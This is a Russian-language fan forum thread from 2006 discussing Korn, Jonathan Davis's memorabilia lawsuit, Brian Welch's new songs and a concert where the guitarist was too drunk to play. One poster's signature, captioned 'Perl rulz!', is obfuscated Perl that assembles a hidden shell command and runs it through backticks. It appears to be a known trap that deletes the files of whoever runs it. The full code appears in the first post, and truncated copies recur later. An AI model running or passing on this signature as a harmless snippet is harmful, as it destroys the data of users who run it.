Добавлено: Сб Авг 12, 2006 3:45 am Заголовок сообщения:
у меня этого нет _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Сб Авг 12, 2006 11:40 am Заголовок сообщения:
Lobzik писал(а):
это вообще фотки для альбома его вроде предназначались
сделаны они в Хорватии
ну а вообще не так всё запущено
покрайне мере когда я смотрел видео снятое в Индии,где Хед помогает строить школы и помогает с хавчиком,выглядел он вполне нормально там,ходил прикалывался
наверняка ты слышал его 4 пробные песни,ну или хотя бы одну,где он полудолларого рэпера опускает
скачал и заценил, вобщем че скажу
я к такой, ну, электронной чтоли музыке не привык и мож поэтому но то и дело дрожь по спине пробегала)
короче говоря, я бы альбомчик заценил !)) :Р
зы: в песне про полбакса там так и должно заканчиваться или это у меня глюки на компе?) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
зы: в песне про полбакса там так и должно заканчиваться или это у меня глюки на компе?)
ну она немного обрезана в конце,но там обрезана только музыка
вообще Хед говорил что скорее всего в альбоме будет только пара песен электронных,а в остальных песнях будет звучать его любимая K7 _________________ АЙС
и простите меня за то, что я сейчас буду писать ну совершенно не продолжение о творчестве Хэда.
смотрела видео, там Дэвис записывает песню Kill you(ну или как сказать точнее). человек просто пропускает ее через себя. в конце бедняга просто обливался слезами. может я слишком впечатлительная, но меня это очень тронуло.
он все песни так поёт,кроме последнего альбома
это меня и цепляет,его пение со сжатыми зубами,Дэвис чуть ли не разрывается от эмоций
песню daddy он вообще не может петь
единственный раз когда он её пел у него случился нервный срыв и он ушёл со сцены _________________ АЙС
Про музей ужасов Джонатана,короче он уже давно собирает вещи серийных маньяков и других милых убийц и душегубов.
И вообщем он собирается открыть музей посвященный этой теме,но какой-то хрен горбатый который тоже собирает такие вещи подал на Девиса в суд... _________________ АЙС
Добавлено: Вт Авг 22, 2006 12:13 am Заголовок сообщения:
там понт в другом, типа якобы этот хрен собирал эти вещи и дэвису сказал, дэвис предложил ему 250 штук бачей чтобы помоч, потом денег не дал, стал раскручивать идею типа это его собственная, хрен захотел подать в суд, хрену предложили еще 350 штук чтоб он не подавал, он согласился, денег не получил и решил подать в суд и тд в том же духе _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вт Авг 22, 2006 12:30 am Заголовок сообщения:
вообще не совсем так, первым музей открыть хотел Девис,но после рождения ребёнка он передумал и решил отдать или выставить на аукцион эти вещи,а дальше эта история как-то запутана _________________ АЙС
Добавлено: Вт Авг 22, 2006 12:31 am Заголовок сообщения:
ну я как понял из статьи )) вообще тебе про это наверно виднее) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Пн Сен 04, 2006 1:40 pm Заголовок сообщения:
Цитата:
Bill Raymond рассказал Korn Space о концерте Family Values в PNC Bank Arts Center в Holmdel, New Jersey где гитарист James "Munky" Shaffer перепил, и был не в состоянии сыграть завершающую песню того вечера, Blind.
Когда Korn играли 'Hollow Life' в акустике, JD сказал что Munky пьян. Вскоре после того, как они сыграли 'Hollow Life,' Munky взял свою гитару и что то сделал с ней вокруг микрафонной стойки. Гитара запуталась, и попытки ее отсоединить закончились неудачей, но она была подсоединена к микрафону и кабелю.
Munky был позже замечен за кулисами, спящим за мониторами, в то время как басист Fieldy выступил в роли Munky и сыграл его партию в 'Blind.'
Также вокалист Stone Sour's Corey Taylor принял участие в исполнении хита KoRn - Freak On A Leash, впервые которую Corey пел на Download Festival 2006.
На фотографии вы можете видеть Fieldy, который держит в руках ту самую заветную гитару Munky.